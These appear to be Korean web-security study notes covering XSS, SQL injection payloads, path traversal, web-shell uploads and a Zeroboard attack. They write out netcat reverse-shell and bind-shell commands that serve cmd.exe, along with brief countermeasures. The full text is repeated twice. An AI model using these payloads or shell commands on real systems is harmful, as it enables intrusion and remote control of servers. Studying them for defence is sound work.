1. XSS
글쓰기 할 때, 게시물에 스크립트 작성
대응: 문자열 대체
ex) 열람자의 쿠키값 전송
2. 인증 및 세션관리 replay attack
쿠키값으로 해당 사용자로 로그인.
버퍼플러쉬. http 헤더 조작
대응: 쿠키값 암호화
3. SQL Injection
[' or 1 = 1 --] select 쿼리문에 대해서 true 리턴
[' or 1 = (@@version) --]
대웅: XSS와 유사
4. File Download
상대경로로 접근해서 시스템 폴더 ACCESS
5. File Upload
web 쉘
* NCSC 국정원 (국각사이버안전센터)
- URL http://www.ncsc.go.kr/
- USB해킹방지
- 문서암호화
* 제로보드 취약점 공격
① File Upload
- 제로보드에서 .asp 필터링하지만, .asa 필터링 안함
- /bbs/data/free/shell.txt
- WebAdmin 2.x
② 리버스텔넷
(넷캐쉬)파이프라인 프로그램
nc.exe
③ 파이프 통신 nc -l -p 9098
클라이언트)
nc IP 9098 -e "c:\cmd.exe 경로"
아웃바운드 리버스 커넥션
④ 서버측에서 직접 얻기
서버 nc -l -p 9098 -e "cmd경로"
클라이언트)
nc 서버IP 9098 (서버 시스템쉘 획득)
⑤ char(76)
ascii코드값을 캐릭터로 변환
* 보안대책
- 실행폴더 권한 없애기
- 업로드폴더를 웹폴더 밖에 두기
글쓰기 할 때, 게시물에 스크립트 작성
대응: 문자열 대체
ex) 열람자의 쿠키값 전송
2. 인증 및 세션관리 replay attack
쿠키값으로 해당 사용자로 로그인.
버퍼플러쉬. http 헤더 조작
대응: 쿠키값 암호화
3. SQL Injection
[' or 1 = 1 --] select 쿼리문에 대해서 true 리턴
[' or 1 = (@@version) --]
대웅: XSS와 유사
4. File Download
상대경로로 접근해서 시스템 폴더 ACCESS
5. File Upload
web 쉘
* NCSC 국정원 (국각사이버안전센터)
- URL http://www.ncsc.go.kr/
- USB해킹방지
- 문서암호화
* 제로보드 취약점 공격
① File Upload
- 제로보드에서 .asp 필터링하지만, .asa 필터링 안함
- /bbs/data/free/shell.txt
- WebAdmin 2.x
② 리버스텔넷
(넷캐쉬)파이프라인 프로그램
nc.exe
③ 파이프 통신 nc -l -p 9098
클라이언트)
nc IP 9098 -e "c:\cmd.exe 경로"
아웃바운드 리버스 커넥션
④ 서버측에서 직접 얻기
서버 nc -l -p 9098 -e "cmd경로"
클라이언트)
nc 서버IP 9098 (서버 시스템쉘 획득)
⑤ char(76)
ascii코드값을 캐릭터로 변환
* 보안대책
- 실행폴더 권한 없애기
- 업로드폴더를 웹폴더 밖에 두기